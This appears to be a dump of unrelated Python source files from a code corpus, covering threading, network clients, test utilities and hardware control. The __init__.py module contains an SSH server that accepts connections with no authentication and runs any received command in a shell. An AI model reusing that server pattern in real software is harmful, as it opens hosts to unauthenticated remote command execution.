'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
__init__.py
|
import sys
import socket
import threading
import subprocess
import errno
from pkg_resources import resource_string
import io
import paramiko
try:
import queue
except ImportError:
import Queue as queue
import logging
from .util import *
from .stream import *
class ServerInterface(paramiko.ServerInterface):
timeout = 10
def __init__(self, socket, server_key=None):
paramiko.ServerInterface.__init__(self)
self.queue = queue.Queue()
if server_key is None:
server_key = resource_string(__name__, 'server-key').decode('ascii')
server_key = paramiko.RSAKey(file_obj=io.StringIO(server_key))
else:
server_key = paramiko.RSAKey(filename=server_key)
self.transport = paramiko.Transport(socket)
self.transport.add_server_key(server_key)
self.transport.start_server(server=self)
def get_command(self):
try:
return self.queue.get(True, self.timeout)
except queue.Empty:
logging.error('Client passed no commands')
self.transport.close()
return None, None
except Exception as e:
self.transport.close()
raise e
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_exec_request(self, channel, command):
self.queue.put((channel, command))
return True
class Proxy(ServerInterface):
def __init__(self, socket=None, username=None, server_key=None, **kwargs):
self.username = username
ServerInterface.__init__(self, socket or StdSocket(), server_key=server_key)
client, command = self.get_command()
if client:
self.relay_to_remote(client, command, username=self.username, **kwargs)
def relay_to_remote(self, client, command, *args, **kwargs):
self.remote = None
try:
self.remote = self.connect_to_remote(*args, **kwargs)
remote = self.remote.get_transport().open_session()
remote.exec_command(command)
pipe_streams(ChannelStream(client), ChannelStream(remote))
if remote.exit_status_ready():
status = remote.recv_exit_status()
client.send_exit_status(status)
finally:
client.close()
if self.remote:
self.remote.close()
self.transport.close()
@staticmethod
def connect_to_remote(host, port, username, host_key_check=True, **kwargs):
client = paramiko.SSHClient()
if host_key_check:
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logging.info('Connecting to ssh host %s@%s:%s ...', username, host, port)
client.connect(host, port, username=username, **kwargs)
return client
def check_auth_none(self, username):
self.username = username
return paramiko.AUTH_SUCCESSFUL
def get_allowed_auths(self, username):
return 'none'
class ProxyServer(Proxy):
HOST = b'__HOST__'
def __init__(self, *args, **kwargs):
self.env = {}
Proxy.__init__(self, *args, **kwargs)
def check_channel_env_request(self, channel, key, value):
self.env[key] = value
return True
def relay_to_remote(self, *args, **kwargs):
username, host, port = parse_host_string(self.env[self.HOST].decode('utf-8'))
kwargs.update(username=username, host=host, port=port)
return super(ProxyServer, self).relay_to_remote(*args, **kwargs)
class Server(ServerInterface):
def __init__(self, socket, **kwargs):
ServerInterface.__init__(self, socket, **kwargs)
client, command = self.get_command()
if not client:
return
logging.info('Executing %r', command)
process = None
try:
process = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
pipe_streams(ChannelStream(client), ProcessStream(process))
if not client.closed:
client.send_exit_status(process.wait())
finally:
self.kill_process(process)
client.close()
self.transport.close()
def check_auth_none(self, username):
return paramiko.AUTH_SUCCESSFUL
def get_allowed_auths(self, username):
return 'none'
def kill_process(self, process):
if process:
process.stdout.close()
process.stdin.close()
process.stderr.close()
if process.poll() is None:
process.kill()
def run_server(host, port, worker=Server, **kwargs):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logging.debug('bind()')
sock.bind((host, port))
logging.debug('listen()')
sock.listen(100)
threads = []
try:
while True:
# clean up closed connections
threads = [t for t in threads if not t.isAlive()]
logging.debug('accept()')
logging.info('Server started')
client, address = sock.accept()
logging.info('Got a connection!')
thread = threading.Thread(target=worker, args=(client,), kwargs=kwargs)
thread.daemon = True
threads.append(thread)
thread.start()
except KeyboardInterrupt:
# stop server on ctrl+c
pass
finally:
sock.close()
|
pid_test.py
|
'''
Created on 12/04/2015
@author: david
'''
from math import sin, cos
import random
from threading import Thread
import time
from flight.stabilization.pid import PID
class SensorReader(object):
def __init__(self, readDelegate):
self._readDelegate = readDelegate
def readCurrentValue(self):
return self._readDelegate()
class ResultSetter(object):
def __init__(self, setResultDelegate):
self._setResultDelegate = setResultDelegate
def setResult(self, newValue):
self._setResultDelegate(newValue)
class SimulatedDrone(object):
def __init__(self):
random.seed()
self._accData = [0.0, 0.0]
self._accTarget = [0.0, 0.0]
#self._accZ = 0.0
#self._gyroZ = 0.0
self._motors = [0.0, 0.0, 0.0, 0.0]
self._sensorReaderX = SensorReader(self._readAccX)
self._sensorReaderY = SensorReader(self._readAccY)
self._resultSetterX = ResultSetter(self._setX)
self._resultSetterY = ResultSetter(self._setY)
self._pidAnglesSpeed = PID([0.1]*2, [0.1]*2, 0,[self._sensorReaderX,self._sensorReaderY], \
[self._resultSetterX, self._resultSetterY], [0]*2, 2)
self._pidAnglesSpeed.setTargets(self._accTarget)
self._printThread = Thread(target=self._printStatusDelegate)
self._isRunning = False
def _calculateAcc(self, motorPos1Id, motorPos2Id, motorNeg1Id, motorNeg2Id, accIndex, defect):
acc = self._motors[motorPos1Id] + self._motors[motorPos2Id] - self._motors[motorNeg1Id] - self._motors[motorNeg2Id]
self._accData[accIndex] = acc + defect
def _readAccX(self):
#self._accData[0] = self._accData[0] + random.uniform(-0.1, 0.1)
return self._accData[0]
def _readAccY(self):
#self._accData[1] = self._accData[1] + random.uniform(-0.01, 0.01)
return self._accData[1]
def _setMotor(self, motorId, increment):
newValue = self._motors[motorId] + increment
if newValue > 100.0:
newValue = 100.0
elif newValue < 0.0:
newValue = 0.0
self._motors[motorId] = newValue
def _setY(self, increment):
self._setMotor(0, -increment)
self._setMotor(3, -increment)
self._setMotor(1, increment)
self._setMotor(2, increment)
self._calculateAcc(1, 2, 0, 3, 1, 0.0)
def _setX(self, increment):
self._setMotor(0, -increment)
self._setMotor(1, -increment)
self._setMotor(2, increment)
self._setMotor(3, increment)
self._calculateAcc(2, 3, 0, 1, 0, 0.5)
def _printStatusDelegate(self):
while self._isRunning:
print "Accel :{0}; Motors:{1})".format(self._accData, self._motors)
time.sleep(1)
def addThrottle(self, increment):
for motorId in range(4):
self._motors[motorId] = self._motors[motorId] + increment
def shift(self, angle, radius):
acc = 0.1 * radius / 100.0
xacc = sin(angle) * acc
yacc = cos(angle) * acc
self._accTarget[0] = xacc
self._accTarget[1] = yacc
self._pidAnglesSpeed.setTargets(self._accTarget)
print "Target: {0}".format(self._accTarget)
def start(self):
self._isRunning = True
self._printThread.start()
self._pidAnglesSpeed.start()
def stop(self):
self._isRunning = False
self._pidAnglesSpeed.stop()
self._pidAnglesSpeed.join()
self._printThread.join()
if __name__ == '__main__':
drone = SimulatedDrone()
drone.start()
done = False
while not done:
command = raw_input("Command? >").strip().split()
command0 = command[0]
if command0 == "Q":
done = True
elif command0 == "T":
increment = float(command[1])
drone.addThrottle(increment)
elif command0 == "S":
angle = float(command[1])
increment = float(command[2])
drone.shift(angle, increment)
print "Finishing..."
drone.stop()
print "Goodbye!"
|
irc.py
|
# IRC Crawler
# Jimmy Trimer
import socket
import time
import datetime
import threading
#from darkweb.modules.base
from darkweb.modules.base.crawler import Crawler
from darkweb.modules.base.result import *
from darkweb.modules.base.crawlerconfig import *
#from crawler import Crawler
#from result import *
#from crawlerconfig import *
class IRC(Crawler):
def __init__(self, config, nickname="aaabbbcccddd", mins_interval="10", total_mins="60"):
self.config = config
self.server = config.location
self.channels = []
self.num_channels = None
if "nickname" in config.options.keys():
self.nickname = config.options["nickname"]
else:
self.nickname = nickname
if "mins_interval" in config.options.keys():
self.mins_interval = int(config.options["mins_interval"])
else:
self.mins_interval = mins_interval
if "total_mins" in config.options.keys():
self.total_mins = int(config.options["total_mins"])
else:
self.total_mins = total_mins
if "channels" in config.options.keys():
for channel in config.options["channels"].split(","):
self.channels.append(channel)
self.num_channels = len(self.channels)
# self.channel = config.options["channel"]
if self.num_channels == None:
if "num_channels" in config.options.keys():
self.num_channels = int(config.options['num_channels'])
else:
self.num_channels = 1
# self.connect()
# self.channels = self.getChannels()
# self.channels = []
self.run(self.channels)
def connect(self):
self.irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to server... %s" % self.server)
self.irc.connect((self.server, 6667))
self.irc.send("USER " + self.nickname + " " + self.nickname + " " + self.nickname + " :" + self.nickname
+ " \n")
self.irc.send("NICK " + self.nickname + "\n")
while(True):
print("looking for motd")
temp = self.irc.recv(2048)
if(temp == "" or temp == None or temp == "-1"):
break
if("/MOTD" in temp):
break
print("Connected to %s!" % self.server)
return
# close irc connection
def close(self):
self.irc.close()
return
# join an irc channel
# must be connected to server first
def joinChannel(self, channel):
self.channel = channel
self.irc.send("JOIN " + self.channel + "\n")
return
# Recv data from irc server
def get_text(self):
text = self.irc.recv(2048)
if text.find('PING') != -1:
self.irc.send('PONG ' + text.split()[1] + "\r\n")
return ""
return text
# return list of channels from server
def getChannels(self):
print("Getting Channels..."),
self.irc.send("LIST\n")
data = ""
while(True):
d = self.irc.recv(2048)
data += d
if(d == "" or d == None or d == "-1"):
break
if("End of /LIST" in d):
break
channels = []
data_split = data.split("\n")
for line in data_split:
if "322" in line:
channel = line.split(" ")[3]
channels.append(channel)
return channels
# def doCrawl(self, mins_interval, total_mins, crawler_config, channel):
def doCrawl(self, channel=None):
session_text = ""
finished = False
i = 0
self.connect()
self.joinChannel(channel)
print("Starting to listen... %s" % channel)
start_time_total = time.time()
start_time = time.time()
cur_time = time.time()
while(not finished):
#print("cur_time: %d total_time: %d" % ((cur_time - start_time), (cur_time - start_time_total)))
text = self.get_text()
#print("Text: %s" % text)
if text != "":
#print(session_text)
session_text += (text+"\n")
cur_time = time.time()
#print(self.mins_interval*60)
if((cur_time - start_time) >= self.mins_interval*60):
print("="*80)
# print(session_text)
utc_start_time = datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S')
utc_cur_time = datetime.datetime.fromtimestamp(cur_time).strftime('%Y-%m-%d %H:%M:%S')
print("Start time: %s End time: %s %s" % (utc_start_time, utc_cur_time, channel))
result = Result(self.config, utc_start_time, utc_cur_time, (self.server, channel), "", session_text)
self.send_result(result)
session_text = ""
start_time = time.time()
if((cur_time - start_time_total) >= self.total_mins*60):
finished = True
print("finished = True")
return
# run each crawl in a thread
def run(self, channels):
print(channels)
if len(channels) == 0:
self.connect()
channels = self.getChannels()
self.close()
for i in range(0, self.num_channels):
print("running %s" % channels[i])
t = threading.Thread(target=self.doCrawl, args=(channels[i], ))
t.start()
return
if __name__ == "__main__":
options = { 'mins_interval': "1",
'total_mins': "2",
'num_channels': "1",
# 'channels': "security,linux,information-node"
'channels': "##linux",
'nickname': "tnasty11"
}
config = CrawlerConfig("irc.freenode.net", "IRC", "", "","", options)
irc = IRC(config)
print("Done")
|
azync.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
__all__ = ['await_callback']
class ThreadExceptHookHandler(object):
"""Workaround to deal with a bug in the Python interpreter (!).
Report: http://bugs.python.org/issue1230540
Discussion: https://stackoverflow.com/a/31622038/269335
PR (not yet merged): https://github.com/python/cpython/pull/8610
Disclaimer (!): https://news.ycombinator.com/item?id=11090814
"""
def __enter__(self):
original_init = threading.Thread.__init__
def init(self, *args, **kwargs):
original_init(self, *args, **kwargs)
original_run = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
original_run(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
self._original_init = original_init
threading.Thread.__init__ = init
return self
def __exit__(self, *args):
threading.Thread.__init__ = self._original_init
def await_callback(async_func, callback_name='callback', errback_name=None, *args, **kwargs):
"""Wait for the completion of an asynchronous code that uses callbacks to signal completion.
This helper function turns an async function into a synchronous one,
waiting for its completion before moving forward (without doing a busy wait).
It is useful to minimize "callback hell" when more advanced options
like ``asyncio`` are not available.
Parameters
----------
async_func : callable
An asynchronous function that receives at least one callback parameter
to signal completion.
callback_name : string, optional
Name of the callback parameter of ``async_func``.
Default is `callback`.
errback_name : string, optional
Name of the error handling callback parameter of ``async_func``.
Default is None.
Notes
-----
Exceptions thrown during the async execution are handled and re-thrown as normal
exceptions, even if they were raised on a different thread.
Examples
--------
The following example shows how to await an async function (``do_sync_stuff`` in
the example), using this utility:
.. code-block:: python
from compas.utilities import await_callback
def do_async_stuff(callback):
from threading import Thread
def runner(cb):
print('doing async stuff')
# ..
cb('done')
Thread(target=runner, args=(callback, )).start()
result = await_callback(do_async_stuff)
"""
wait_event = threading.Event()
call_results = {}
def inner_callback(*args, **kwargs):
try:
call_results['args'] = args
call_results['kwargs'] = kwargs
wait_event.set()
except Exception as e:
call_results['exception'] = e
wait_event.set()
kwargs['callback'] = inner_callback
if errback_name:
def inner_errback(error):
if isinstance(error, Exception):
call_results['exception'] = error
else:
call_results['exception'] = Exception(str(error))
wait_event.set()
kwargs[errback_name] = inner_errback
def unhandled_exception_handler(type, value, traceback):
call_results['exception'] = value
wait_event.set()
try:
# Install unhanlded exception handler
sys.excepthook = unhandled_exception_handler
# Invoke async method and wait
with ThreadExceptHookHandler():
async_func(*args, **kwargs)
wait_event.wait()
finally:
# Restore built-in unhanled exception handler
sys.excepthook = sys.__excepthook__
if 'exception' in call_results:
raise call_results['exception']
return_value = call_results['args']
dict_values = call_results['kwargs']
if not dict_values:
# If nothing, then None
if len(return_value) == 0:
return None
# If it's a one-item tuple,
# un-wrap from it and return that element
elif len(return_value) == 1:
return return_value[0]
else:
return return_value
if not return_value:
return dict_values
return return_value + (dict_values,)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
from statistics import median
from threading import Thread
from prettytable import PrettyTable
try:
from ROAR.ROAR_Jetson.memory import Memory
except:
from memory import Memory
class PartProfiler:
def __init__(self):
self.records = {}
def profile_part(self, p):
self.records[p] = {"times": []}
def on_part_start(self, p):
self.records[p]['times'].append(time.time())
def on_part_finished(self, p):
now = time.time()
prev = self.records[p]['times'][-1]
delta = now - prev
thresh = 0.000001
if delta < thresh or delta > 100000.0:
delta = thresh
self.records[p]['times'][-1] = delta
def report(self):
print("Part Profile Summary: (times in ms)")
pt = PrettyTable()
pt.field_names = ["part", "max", "min", "avg", "median"]
for p, val in self.records.items():
# remove first and last entry because you there could be one-off
# time spent in initialisations, and the latest diff could be
# incomplete because of user keyboard interrupt
arr = val['times'][1:-1]
if len(arr) == 0:
continue
pt.add_row([p.__class__.__name__,
"%.2f" % (max(arr) * 1000),
"%.2f" % (min(arr) * 1000),
"%.2f" % (sum(arr) / len(arr) * 1000),
"%.2f" % (median(arr) * 1000)])
print(pt)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.profiler = PartProfiler()
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
ouputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
self.profiler.profile_part(part)
def remove(self, part):
"""
remove part form list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinite loop
that runs each part and updates the memory.
Args:
verbose:
rate_hz : int, The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int, Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
print('Starting vehicle...')
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loopcount
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop with value:', abs(sleep_time))
if verbose and loop_count % 200 == 0:
self.profiler.report()
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self, new_throttle: float = 0, new_steering: float = 0):
"""
loop over all parts
"""
for entry in self.parts:
run = True
# check run condition, if it exists
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
if run:
# get part
p = entry['part']
# start timing part run
self.profiler.on_part_start(p)
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
# finish timing part run
self.profiler.on_part_finished(p)
def stop(self):
print('\n\nShutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
# usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
self.profiler.report()
|
game-client.py
|
import socket
import threading
import subprocess
class Client:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
message = ""
server_address = 0
player_number = 0
def welcome(self):
print("Welcome, please enter the address of the connection you want to reach")
try:
address = input("Address: ")
port = input("Port: ")
print("Connecting to "+address+":"+port+"...")
return (address, int(port))
except:
return ("0.0.0.0",0)
def send_message(self):
while True:
self.message = input("Message: ")
self.s.sendall(self.message.encode())
if self.message=="quit":
break
def game_process(self):
subprocess.call(["./connect4"])
def __init__(self):
self.server_address = self.welcome()
thread = threading.Thread(target=self.game_process)
thread.daemon = True
thread.start()
def connect(self):
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(self.server_address)
except:
print("An error has ocurred")
#First message recieved from the server is the player number
self.player_number = self.s.recv(2048).decode()
subprocess.call(["./writer", player_number])
thread = threading.Thread(target=self.send_message)
thread.daemon = True
thread.start()
while True:
server_message = self.s.recv(2048).decode()
if not server_message:
break
subprocess.call(["./writer",server_message])
if self.message=="quit":
break
self.s.close()
client = Client()
client.connect()
|
videoovercrow.py
|
#!/usr/bin/env python3
import io
import numpy as np
import cv2
from PIL import Image
import pycrow as crow
import threading
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 320);
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 240);
cap.set(cv2.CAP_PROP_SATURATION,0.2);
crow.create_udpgate(12, 10011)
addr = ".12.127.0.0.1:10009"
crow.set_crowker(".12.127.0.0.1:10009")
caddr = crow.compile_address(addr)
#crow.diagnostic_enable()
thr = threading.Thread(target=crow.spin, args=())
thr.start()
while(True):
ret, frame = cap.read()
jpg = Image.fromarray(frame)
tmpFile = io.BytesIO()
jpg.save(tmpFile,'JPEG')
tmpFile.seek(0)
data = tmpFile.read()
# print(data[-40:-1])
crow.publish(caddr, "video_stream", data, 0, 200)
cap.release()
cv2.destroyAllWindows()
|
poor_mans_profiler_gdb.py
|
import threading
import time
import signal
import os
debug = True
gdb.execute('set pagination 0')
def log(*msg):
if debug:
print(*msg)
def pause_after_sec(secs, end):
global pausestart
log("Thread starting. Stopping after %ss" % secs)
time.sleep(end-time.time())
# stop running gdb by sending sigint
pausestart = time.time()
os.kill(os.getpid(), signal.SIGINT)
log("Thread finishing")
def get_bt_and_pause(secs):
global pauses
gdb.execute('bt')
log("\nContinuing Execution for a while. Starting watchdog.")
thread = threading.Thread(target=pause_after_sec, args=(secs,time.time()+secs))
thread.start()
log("Resuming Process.")
gdb.execute("continue")
log("Joining Thread. Should not be necessary, since gdb is stopped only when thread is finished")
thread.join()
pauses = 0
pausestart = time.time()
for i in range(1,1000):
get_bt_and_pause(1)
|
example_test.py
|
from __future__ import unicode_literals
from tiny_test_fw import Utility
import os
import serial
import threading
import time
import ttfw_idf
class SerialThread(object):
'''
Connect to serial port and fake responses just like from a real modem
'''
# Dictionary for transforming received AT command to expected response
AT_FSM = {b'AT+CGMM': b'0G Dummy Model',
b'AT+CGSN': b'0123456789',
b'AT+CIMI': b'ESP',
b'AT+COPS?': b'+COPS: 0,0,"ESP Network"',
b'AT+CSQ': b'+CSQ: 4,0',
b'AT+CBC': b'+CBC: 0,50',
b'ATD*99***1#': b'CONNECT',
}
def run(self, log_path, exit_event):
with serial.Serial(self.port, 115200) as ser, open(log_path, 'w') as f:
buff = b''
while not exit_event.is_set():
time.sleep(0.1)
buff += ser.read(ser.in_waiting)
if not buff.endswith(b'\r'):
continue # read more because the complete command wasn't yet received
cmd_list = buff.split(b'\r')
buff = b''
for cmd in cmd_list:
if len(cmd) == 0:
continue
snd = self.AT_FSM.get(cmd, b'')
if snd != b'':
snd += b'\n'
snd += b'OK\n'
f.write('Received: {}\n'.format(repr(cmd.decode())))
f.write('Sent: {}\n'.format(repr(snd.decode())))
ser.write(snd)
def __init__(self, port, log_path):
self.port = port
self.exit_event = threading.Event()
self.t = threading.Thread(target=self.run, args=(log_path, self.exit_event,))
self.t.start()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.exit_event.set()
self.t.join(60)
if self.t.is_alive():
Utility.console_log('The serial thread is still alive', 'O')
@ttfw_idf.idf_example_test(env_tag='Example_PPP')
def test_examples_pppos_client(env, extra_data):
rel_project_path = 'examples/protocols/pppos_client'
dut = env.get_dut('pppos_client', rel_project_path)
project_path = os.path.join(dut.app.get_sdk_path(), rel_project_path)
modem_port = '/dev/ttyUSB{}'.format(0 if dut.port.endswith('1') else 1)
with SerialThread(modem_port, os.path.join(project_path, 'serial.log')):
dut.start_app()
dut.expect_all('pppos_example: Module: 0G Dummy Model',
'pppos_example: Operator: "ESP Network"',
'pppos_example: IMEI: 0123456789',
'pppos_example: IMSI: ESP',
'pppos_example: rssi: 4, ber: 0',
'pppos_example: Battery voltage: 0 mV',
'pppos_example: Modem PPP Started',
timeout=60)
cmd = ('pppd {} 115200 10.0.0.1:10.0.0.2 logfile {} local noauth debug nocrtscts nodetach +ipv6'
''.format(modem_port, os.path.join(project_path, 'ppp.log')))
with ttfw_idf.CustomProcess(cmd, '/dev/null'): # Nothing is printed here
dut.expect_all('pppos_example: Modem Connect to PPP Server',
'pppos_example: IP : 10.0.0.2',
'pppos_example: Netmask : 255.255.255.255',
'pppos_example: Gateway : 10.0.0.1',
'pppos_example: Name Server1: 0.0.0.0',
'pppos_example: Name Server2: 0.0.0.0',
'pppos_example: GOT ip event!!!',
'pppos_example: MQTT other event id: 7',
# There are no fake DNS server and MQTT server set up so the example fails at this point
'TRANS_TCP: DNS lookup failed err=202 res=0x0',
'MQTT_CLIENT: Error transport connect',
'pppos_example: MQTT_EVENT_ERROR',
'pppos_example: MQTT_EVENT_DISCONNECTED')
if __name__ == '__main__':
test_examples_pppos_client()
|
headless.py
|
"""
A simple voice-enabled client that has no user interface. It currently supports
keyword-based activation through either pocketsphinx or
`snowboy <https://snowboy.kitt.ai/>`_ models.
.. warning::
This client is experimental and is currently under active development.
Requirements
++++++++++++
* Requires a working pyaudio installation (with portaudio)
``apt-get install portaudio19-dev``
``apt-get install python-pyaudio``
Or
``pip3 install pyaudio --user``
* Requires pocketsphinx, webrtcvad, respeaker
``apt-get install pocketsphinx``
``pip3 install pocketsphinx webrtcvad``
``pip3 install git+https://github.com/respeaker/respeaker_python_library.git``
* May also need PyUSB
``pip3 install pyusb``
* Requires pydub for converting mp3 and ogg to wav for playback
``pip3 install pydub``
See https://github.com/jiaaro/pydub for system dependencies.
``apt-get install ffmpeg libavcodec-ffmpeg-extra56``
Or
``brew install ffmpeg --with-libvorbis --with-ffplay --with-theora``
* Requires anypubsub
``pip3 install anypubsub --user``
* Requires pymongo
``apt-get install python3-pymongo``
Or
``pip3 install pymongo --user``
* Requires that Eva have the
`Audio Server <https://github.com/edouardpoitras/eva-audio-server>`_ plugin enabled
Optional
++++++++
You may optionally use `snowboy`_ for keyword
detection. To do so, you need to get the ``_snowboydetect.so`` binary for your
platform (the one found at ``clients/snowboy/_snowboydetect.so`` in this repo is
only for Python3 on Ubuntu).
You can get precompiled binaries and information on how to compile
`here <https://github.com/kitt-ai/snowboy#precompiled-binaries-with-python-demo>`_.
If you end up compiling, ensure you use swig >= 3.0.10 and use your platform's
Python3 command in the Makefile (default is just ``python``).
Once you've compiled snowboy (or downloaded the dependencies), put the
``_snowboydetect.so`` and ``snowboydetect.py`` files in the ``clients/snowboy/``
folder.
You can either get a keyword detection model on the snowboy
`website <https://snowboy.kitt.ai/>`_ or use the provided alexa one in this
repository.
Usage
+++++
``python3 clients/headless.py``
Or with a snowboy model:
``python3 clients/headless.py --snowboy-model=clients/snowboy/alexa.umdl``
"""
import os
import time
import socket
import argparse
from threading import Thread, Event
from multiprocessing import Process
from respeaker.microphone import Microphone
from pymongo import MongoClient
from anypubsub import create_pubsub_from_settings
from pydub import AudioSegment
from pydub.playback import play as pydub_play
# Check for Snowboy.
try:
import snowboy.snowboydecoder
except: #pylint: disable=W0702
print('WARNING: Could not import Snowboy decoder/model - falling back to Pocketsphinx')
# Arguments passed via command line.
ARGS = None
# The sound played when Eva recognizes the keyword for recording.
PING_FILE = os.path.abspath(os.path.dirname(__file__)) + '/resources/ping.wav'
PONG_FILE = os.path.abspath(os.path.dirname(__file__)) + '/resources/pong.wav'
# Pocketsphinx/respeaker configuration.
os.environ['POCKETSPHINX_DIC'] = os.path.abspath(os.path.dirname(__file__)) + '/dictionary.txt'
os.environ['POCKETSPHINX_KWS'] = os.path.abspath(os.path.dirname(__file__)) + '/keywords.txt'
class DummyDecoder(object): #pylint: disable=R0903
"""
Fake decoder in order to use respeaker's listen() method without setting
up a pocketsphinx decoder.
"""
def start_utt(self):
"""
Overloaded method that simply passes.
"""
pass
def listen(quit_event):
"""
Utilizes respeaker's Microphone object to listen for keyword and sends audio
data to Eva over the network once the keyword is heard.
Audio data will be sent for a maximum of 5 seconds and will stop sending
after 1 second of silence.
:param quit_event: A threading event object used to abort listening.
:type quit_event: :class:`threading.Event`
"""
global ARGS
global mic
if ARGS.snowboy_model:
mic = Microphone(quit_event=quit_event, decoder=DummyDecoder())
while not quit_event.is_set():
detector = snowboy.snowboydecoder.HotwordDetector(ARGS.snowboy_model, sensitivity=0.5)
detector.start(detected_callback=handle_command,
interrupt_check=quit_event.is_set,
sleep_time=0.03)
detector.terminate()
else:
mic = Microphone(quit_event=quit_event)
while not quit_event.is_set():
if mic.wakeup(ARGS.keyword):
handle_command()
def handle_command():
global mic
play(PING_FILE)
print('Listening...')
data = mic.listen(duration=5, timeout=1)
udp_stream(data)
print('Done')
play(PONG_FILE)
def play(filepath, content_type='audio/wav'):
"""
Will attempt to play various audio file types (wav, ogg, mp3).
"""
if 'wav' in content_type:
sound = AudioSegment.from_wav(filepath)
elif 'ogg' in content_type or 'opus' in content_type:
sound = AudioSegment.from_ogg(filepath)
elif 'mp3' in content_type or 'mpeg' in content_type:
sound = AudioSegment.from_mp3(filepath)
pydub_play(sound)
def udp_stream(data):
"""
Simple helper function to send a generator type object containing audio
data, over to Eva. Uses UDP as protocol.
:param data: Generator type object returned from
respeaker.microphone.Microphone.listen().
:type data: Generator
"""
global ARGS
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for d in data:
udp.sendto(d, (ARGS.eva_host, ARGS.audio_port))
udp.close()
def start_consumer(queue):
"""
Starts a consumer to listen for pubsub-style messages on the specified
queue. Will connect to a MongoDB server specified in the parameters.
Uses multiprocessing.Process for simplicity.
:param queue: The message queue to listen for messages on.
:type queue: string
"""
process = Process(target=consume_messages, args=(queue,))
process.start()
def get_pubsub():
"""
Helper function to get a anypubsub.MongoPubSub object based on parameters
specified by command line. Will tail the 'eva' database's 'communications'
collection for pubsub messages.
